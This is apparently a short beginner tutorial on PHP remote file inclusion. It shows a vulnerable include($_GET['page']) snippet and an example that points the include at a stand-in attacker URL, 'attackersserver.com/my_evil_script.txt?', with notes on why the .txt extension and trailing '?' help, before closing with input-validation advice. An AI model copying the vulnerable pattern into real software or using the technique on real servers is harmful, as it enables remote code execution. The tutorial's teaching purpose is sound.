Basic Remote File Inclusion
Remote file inclusion, commonly known as RFI is a form of attack where the attacker trys to inject there own php code inside your php app's. If an attacker can successfully achieve this they will be able to execute any code they wish on your webserver.
Lets say we have a website that is coded in php, the website uses something like page=page.html to work out which page should be displayed. The code for this might look like
$file =$_GET['page']; //The page we wish to display include($file); ?>
$file ="http://www.attackersserver.com/my_evil_script.txt?"; //$_GET['page']; include($file); //$file is the attackers script ?>
Behind The Scenes
So why can an attacker do this? Well the simple answer is because the include() function (note, this kind of attack isnt only open to the include function, require_once() will also work) allows you to link to remote files, the problem with this is that an attacker can take advantage of that feature, like you just seen. You might be wondering why the script that the attacker includes is a .txt and not a .php. The answer to this is that if the script was a .php and the attackers server had php installed then the script will get executed on the attackers server and not the target. We also add the ? at the end so we can remove anything that might be inside the include() function on the target server, take this script for example
$file =$_GET['page']; include($file .".php"); ?>
There you have it a basic tutorial on what remote file inclusion is and how/why an attacker can use it against your servers. This kind of attack, just like most attacks isnt that hard to stop if you dont trust all data that is coming into you. All you have to really remember is if the data isnt hard coded then you need to check it to make sure it does what it is meant to do. Alot of the attacks that are preformed can be stoped by a few simple checks on the data.